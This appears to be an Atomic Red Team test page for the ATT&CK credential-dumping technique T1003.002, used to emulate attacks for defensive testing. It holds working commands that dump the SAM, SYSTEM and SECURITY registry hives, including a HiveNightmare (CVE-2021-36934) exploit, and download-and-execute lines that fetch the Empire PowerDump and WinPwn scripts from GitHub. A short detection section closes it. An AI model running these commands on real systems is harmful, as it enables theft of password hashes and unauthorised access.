# T1003.002 - Security Account Manager
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py

Alternatively, the SAM can be extracted from the Registry with Reg:

* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes: 

* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.


## Atomic Tests

### Atomic Test #1 - Registry dump of SAM, creds, and secretsLocal SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 1

#### Cleanup: 
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Computer must have python 3 installed

##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%

```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"

```
##### Description: Computer must have pip installed

##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%

```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"

```
##### Description: pypykatz must be installed and part of PATH

##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%

```
##### Get Prereq Commands:
```cmd
pip install pypykatz

```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
pypykatz live registry
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 2

### Atomic Test #3 - esentutl.exe SAM copyCopy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d %temp%/SAM
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 3

#### Cleanup: 
```cmd
del %temp%\SAM >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 3 -Cleanup

### Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1} 
```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 4

### Atomic Test #5 - dump volume shadow copy hives with certutilDump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 5

#### Cleanup: 
```cmd
for /L %a in (1,1,10) do @(del %temp%\SAMvss%a >nul 2>&1)
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 5 -Cleanup

### Atomic Test #6 - dump volume shadow copy hives with System.IO.FileDump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
1..10 | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM" , "$env:TEMP\SAMvss$_", "true") } catch {}
 ls "$env:TEMP\SAMvss$_" -ErrorAction Ignore
}
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 6

#### Cleanup: 
```powershell
1..10 | % {
  rm "$env:TEMP\SAMvss$_" -ErrorAction Ignore
}
```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 6 -Cleanup

### Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM HashesLoot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive  ```

In [ ]:
Invoke-AtomicTest T1003.002 -TestNumbers 7

## Detection
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (<code>%SystemRoot%/system32/config/SAM</code>) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.